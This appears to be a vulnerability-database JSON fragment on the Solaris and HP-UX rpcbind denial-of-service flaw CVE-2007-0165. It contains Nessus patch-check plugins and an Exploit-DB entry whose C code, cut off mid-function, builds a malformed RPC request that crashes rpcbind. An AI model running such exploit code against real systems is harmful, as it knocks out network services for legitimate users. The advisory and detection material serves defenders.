"modified": "2007-01-12T00:00:00", "published": "2007-01-12T00:00:00", "id": "SECURITYVULNS:VULN:7047", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7047", "title": "Sun Solaris rpcbind DoS", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:08:36", "bulletinFamily": "scanner", "description": "s700_800 11.23 libnsl cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .", "modified": "2018-07-12T00:00:00", "published": "2008-10-01T00:00:00", "id": "HPUX_PHNE_36982.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34315", "title": "HP-UX PHNE_36982 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_36982. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34315);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-0165\");\n script_bugtraq_id(21964);\n script_xref(name:\"HP\", value:\"emr_na-c01556916\");\n script_xref(name:\"HP\", value:\"HPSBUX02370\");\n script_xref(name:\"HP\", value:\"SSRT071459\");\n\n script_name(english:\"HP-UX PHNE_36982 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 libnsl cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01556916\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?338fde17\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_36982 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\"))\n{\n exit(0, \"The host is not affected since PHNE_36982 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_36982\", \"PHNE_37488\", \"PHNE_38906\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"NFS.NFS-64ALIB\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64SLIB\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-ENG-A-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SHLIBS\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS2-PRG\", version:\"B.11.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:26:06", "bulletinFamily": "scanner", "description": "SunOS 5.9: libnsl, nispasswdd patch.\nDate this patch was last updated by Sun : Jan/08/07", "modified": "2011-10-24T00:00:00", "published": "2004-07-12T00:00:00", "id": "SOLARIS9_113319.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13535", "type": "nessus", "title": "Solaris 9 (sparc) : 113319-27", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13535);\n script_version(\"$Revision: 1.32 $\");\n\n script_name(english: \"Solaris 9 (sparc) : 113319-27\");\n script_osvdb_id(31576, 48454);\n script_cve_id(\"CVE-2007-0165\", \"CVE-2008-4619\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 113319-27\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.9: libnsl, nispasswdd patch.\nDate this patch was last updated by Sun : Jan/08/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1000297.1.html\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/12\");\n script_cvs_date(\"$Date: 2011/10/24 20:59:25 $\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/09\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 113319-27\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2011 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\n\n\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113319-27\", obsoleted_by:\"115695-02 112960-48 \", package:\"SUNWarc\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113319-27\", obsoleted_by:\"115695-02 112960-48 \", package:\"SUNWarcx\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113319-27\", obsoleted_by:\"115695-02 112960-48 \", package:\"SUNWcsl\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113319-27\", obsoleted_by:\"115695-02 112960-48 \", package:\"SUNWcslx\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113319-27\", obsoleted_by:\"115695-02 112960-48 \", package:\"SUNWcstl\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113319-27\", obsoleted_by:\"115695-02 112960-48 \", package:\"SUNWcstlx\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113319-27\", obsoleted_by:\"115695-02 112960-48 \", package:\"SUNWhea\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113319-27\", obsoleted_by:\"115695-02 112960-48 \", package:\"SUNWnisu\", version:\"11.9.0,REV=2002.04.06.15.27\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:26:43", "bulletinFamily": "scanner", "description": "SunOS 5.8: LDAP2 client, libc, libthread a.\nDate this patch was last updated by Sun : Mar/29/07", "modified": "2011-09-18T00:00:00", "published": "2004-07-12T00:00:00", "id": "SOLARIS8_108993.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13308", "type": "nessus", "title": "Solaris 8 (sparc) : 108993-67", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13308);\n script_version(\"$Revision: 1.63 $\");\n\n script_name(english: \"Solaris 8 (sparc) : 108993-67\");\n script_osvdb_id(31576, 48454, 52557);\n script_cve_id(\"CVE-2007-0165\", \"CVE-2008-4619\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 108993-67\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.8: LDAP2 client, libc, libthread a.\nDate this patch was last updated by Sun : Mar/29/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/108993-67\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/12\");\n script_cvs_date(\"$Date: 2011/09/18 01:29:18 $\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/09\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 108993-67\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2011 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWapppr\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWapppu\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWarc\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWarcx\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWatfsr\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWatfsu\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcarx\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcarx\", version:\"11.8.0,REV=2000.01.13.13.40\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcslx\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcsr\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcstlx\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWcsxu\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWdpl\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWdplx\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWhea\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWlldap\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWmdb\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWmdbx\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWnisr\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWnisu\", version:\"11.8.0,REV=2000.01.08.18.12\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWpppd\", version:\"11.8.0,REV=2001.02.21.14.02\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWpppdr\", version:\"11.8.0,REV=2001.02.21.14.02\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWpppdu\", version:\"11.8.0,REV=2001.02.21.14.02\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWpppdx\", version:\"11.8.0,REV=2001.02.21.14.02\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108993-67\", obsoleted_by:\"128624-01 \", package:\"SUNWpppgS\", version:\"11.8.0,REV=2001.02.21.14.02\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:24:28", "bulletinFamily": "scanner", "description": "SunOS 5.8_x86: LDAP2 client, libc, libthre.\nDate this patch was last updated by Sun : Mar/30/07", "modified": "2011-09-18T00:00:00", "published": "2004-07-12T00:00:00", "id": "SOLARIS8_X86_108994.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13418", "type": "nessus", "title": "Solaris 8 (x86) : 108994-67", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13418);\n script_version(\"$Revision: 1.63 $\");\n\n script_name(english: \"Solaris 8 (x86) : 108994-67\");\n script_osvdb_id(31576, 48454, 52557);\n script_cve_id(\"CVE-2007-0165\", \"CVE-2008-4619\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 108994-67\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.8_x86: LDAP2 client, libc, libthre.\nDate this patch was last updated by Sun : Mar/30/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/108994-67\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/12\");\n script_cvs_date(\"$Date: 2011/09/18 01:29:19 $\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/09\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 108994-67\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2011 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWapppr\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWapppu\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWarc\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWatfsr\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWatfsu\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWcsr\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWdpl\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWhea\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWlldap\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWmdb\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWnisr\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWnisu\", version:\"11.8.0,REV=2000.01.08.18.17\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWpppd\", version:\"11.8.0,REV=2001.02.21.14.14\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWpppdr\", version:\"11.8.0,REV=2001.02.21.14.14\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWpppdu\", version:\"11.8.0,REV=2001.02.21.14.14\");\ne += solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108994-67\", obsoleted_by:\"128625-01 \", package:\"SUNWpppgS\", version:\"11.8.0,REV=2001.02.21.14.14\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:24:26", "bulletinFamily": "scanner", "description": "SunOS 5.9_x86: libnsl, rpc.nispasswdd patc.\nDate this patch was last updated by Sun : Jan/05/07", "modified": "2011-10-24T00:00:00", "published": "2004-07-12T00:00:00", "id": "SOLARIS9_X86_113719.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13582", "type": "nessus", "title": "Solaris 9 (x86) : 113719-21", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13582);\n script_version(\"$Revision: 1.33 $\");\n\n script_name(english: \"Solaris 9 (x86) : 113719-21\");\n script_osvdb_id(31576, 48454);\n script_cve_id(\"CVE-2007-0165\", \"CVE-2008-4619\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 113719-21\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.9_x86: libnsl, rpc.nispasswdd patc.\nDate this patch was last updated by Sun : Jan/05/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1000297.1.html\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/12\");\n script_cvs_date(\"$Date: 2011/10/24 20:59:25 $\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/09\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 113719-21\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2011 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\n\n\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"113719-21\", obsoleted_by:\"115696-02 114242-34 \", package:\"SUNWarc\", version:\"11.9.0,REV=2002.11.04.02.51\");\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"113719-21\", obsoleted_by:\"115696-02 114242-34 \", package:\"SUNWcsl\", version:\"11.9.0,REV=2002.11.04.02.51\");\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"113719-21\", obsoleted_by:\"115696-02 114242-34 \", package:\"SUNWcstl\", version:\"11.9.0,REV=2002.11.04.02.51\");\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"113719-21\", obsoleted_by:\"115696-02 114242-34 \", package:\"SUNWhea\", version:\"11.9.0,REV=2002.11.04.02.51\");\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"113719-21\", obsoleted_by:\"115696-02 114242-34 \", package:\"SUNWnisu\", version:\"11.9.0,REV=2002.11.04.02.51\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T10:14:14", "bulletinFamily": "exploit", "description": "Sun Solaris 9 RPC Request Denial of Service Vulnerability. CVE-2007-0165. Dos exploit for solaris platform", "modified": "2007-01-09T00:00:00", "published": "2007-01-09T00:00:00", "id": "EDB-ID:29406", "href": "https://www.exploit-db.com/exploits/29406/", "type": "exploitdb", "title": "Sun Solaris 9 RPC Request Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/21964/info\r\n\r\nThe Solaris operating system is prone to a denial-of-service vulnerability. \r\n\r\nAn attacker can exploit this issue to crash the 'rpcbind(1M)' server, denying service to legitimate users.\r\n\r\n/*\r\n////////////////////////////////////////////////////////////\r\n// Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS\r\n////////////////////////////////////////////////////////////\r\n//\r\n// Federico L. Bossi Bonin\r\n// fbossi[at]globalST[dot]com[dot]ar\r\n/////////////////////////////////////////////////////\r\n\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xff29b5f4 in __inet_taddr2uaddr () from /usr/lib/libnsl.so.1\r\n(gdb) backtrace\r\n#0 0xff29b5f4 in __inet_taddr2uaddr () from /usr/lib/libnsl.so.1\r\n#1 0x00013d88 in rpcbproc_taddr2uaddr_com ()\r\n#2 0x000161c0 in rpcb_service_4 ()\r\n(gdb)\r\n\r\n*/\r\n\r\n#include <string.h>\r\n#include <rpc/rpc.h>\r\n\r\nstruct xdr {\r\n long long_arg;\r\n char *string_arg;\r\n};\r\n\r\ntypedef struct xdr xdr;\r\nstatic struct timeval TIMEOUT = { 25, 0 };\r\n\r\nbool_t xdr_xdr (XDR *xdrs, xdr *objp) {\r\n register int32_t *buf;\r\n\r\n if (!xdr_long (xdrs, &objp->long_arg))\r\n return FALSE;\r\n if (!xdr_string (xdrs, &objp->string_arg, 4096))\r\n return FALSE;\r\n return TRUE;\r\n}\r\n\r\nchar ** str_4(xdr *argp, CLIENT *clnt) {\r\n static char *clnt_res;\r\n\r\n memset((char *)&clnt_res, 0, sizeof(clnt_res));\r\n if (clnt_call (clnt, 8,\r\n (xdrproc_t) xdr_xdr, (caddr_t) argp,\r\n (xdrproc_t) xdr_wrapstring, (caddr_t) &clnt_res,\r\n TIMEOUT) != RPC_SUCCESS) {\r\n return (NULL);\r\n }\r\n return 